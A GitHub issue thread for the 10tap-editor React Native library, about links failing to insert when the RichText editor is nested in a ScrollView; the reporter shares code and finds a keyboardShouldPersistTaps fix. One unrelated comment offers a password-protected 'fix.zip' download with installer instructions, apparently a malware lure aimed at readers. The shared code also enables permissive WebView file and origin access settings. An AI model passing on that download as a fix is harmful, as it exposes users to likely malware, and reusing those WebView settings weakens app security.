### ISSUE TITLE
[BUG]: Unable to insert Links when RichText is nested in a ScrollView

### ISSUE THREAD

**Issue by jbernhardt-x-team** [10play/10tap-editor#191]
**Describe the bug**
I'm experiencing an issue where I'm unable to insert Links using the Link extension in the Toolbar when the `RichText` component is nested in a `ScrollView`. I checked the content rendered in the `RichText` and there is no `a` element in the HTML when it is nested in a ScrollView

**To Reproduce**
1. Create sample `RichText` component from website
2. Nest component into a RN `ScrollView
3. Try to add a Link from the Toolbar
4. When tapping insert, no `a` element is inserted

**Expected behavior**
Being able to insert Links when the `RichText` is nested in a ScrollView

**Screenshots**
Nested in a regular `View`
https://github.com/user-attachments/assets/eb542554-1fb0-432f-b1e9-64f10a819614

Nested in a `ScrollView`
https://github.com/user-attachments/assets/939e00c5-ecfc-4945-858f-aac49d7e4560

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 17Amir17** [comment]
Could you share your code? Is the toolbar in a keyboard avoiding view? If so could you try taking it out?

**Comment by jbernhardt-x-team** [comment]
@17Amir17 yes, it is, I tried taking it out but didn't resolve it.

The `RichText`
```JavaScript
const RichTextEditor = withI18n()(
  ({
    initialValue = '',
    placeHolderValue = '',
    onContentChange = null,
    isDisabled = false,
    containerStyle,
    webViewContainerStyle,
    hideKeyboardAccessoryViewiOS = true,
    i18n,
    resourceType
  }) => {
    const [height, setHeight] = React.useState(50);
    const editor = useEditorBridge({
      editable: !isDisabled,
      avoidIosKeyboard: true,
      initialContent: initialValue,
      theme: {
        webviewContainer: {
          height,
          paddingHorizontal: 10,
          ...webViewContainerStyle
        }
      },
      bridgeExtensions: [
        ...TenTapStartKit,
        CoreBridge.configureCSS(customFont),
        PlaceholderBridge.configureExtension({
          placeholder: placeHolderValue
        })
      ]
    });
    const bridgeState = useBridgeState(editor);
    const content = useEditorContent(editor, { type: 'html' });
    const TOOLBAR_ITEMS = [...DEFAULT_TOOLBAR_ITEMS];
    _.pullAt(TOOLBAR_ITEMS, [3, 9, 10]); //pull out unwanted items from the Toolbar

    return (
      <View style={[styles.container, containerStyle]}>
        <RichText
          editor={editor}
          nestedScrollEnabled
          allowFileAccess={true}
          allowFileAccessFromFileURLs={true}
          allowUniversalAccessFromFileURLs={true}
          originWhitelist={['*']}
          mixedContentMode="always"
          hideKeyboardAccessoryView={hideKeyboardAccessoryViewiOS}
        />
        <KeyboardAvoidingView
          behavior={Platform.OS === 'ios' ? 'padding' : null}
          keyboardVerticalOffset={50}
          style={styles.keyboardAvoidingView}
        >
          <Toolbar
            editor={editor}
            items={[
              {
                onPress: () => imageSelectedPress,
                active: () => false,
                disabled: () => false,
                image: () => attachPng
              },
              ...TOOLBAR_ITEMS
            ]}
          />
          <LoadingModal show={imageUploadResult.isLoading} />
        </KeyboardAvoidingView>
      </View>
    );
  }
);

const styles = StyleSheet.create({
  container: {
    flex: 1,
    borderColor: colors.colorGray,
    borderWidth: 1,
    marginEnd: 5,
    borderRadius: 2,
    justifyContent: 'center'
  },
  keyboardAvoidingView: {
    position: 'absolute',
    width: '100%',
    bottom: 0
  }
});
```

From the outer component
```JavaScript

<ScrollView
    <View style={[styles.inputs, styles.comment]}>
            <RichTextEditor
              key={result.isError}
              placeHolderValue={i18n._(t`Comment`)}
              hideKeyboardAccessoryViewiOS={false}
              onContentChange={setComment}
              containerStyle={{ borderWidth: 0 }}
              webViewContainerStyle={{ paddingHorizontal: 0 }}
            />
          </View>
 </ScrollView>
```

I have tried pasting the simplest example of the RichText from the docs but since my  `RichText` component works when wrapped around a non `ScrollView` I focusing the attention there.

**Comment by jbernhardt-x-team** [comment]
So I noticed that when I was using a `ScrollView` to wrap the RichText, after tapping "Insert" from the Link toolbar, the keyboard was getting hidden and the toolbar as well, as opposed to the behavior of using a `View` which remained. 

I confirmed that adding the prop `keyboardShouldPersistTaps="always"` to the `ScrollView` fixes the issue of not being able to Insert a Link.
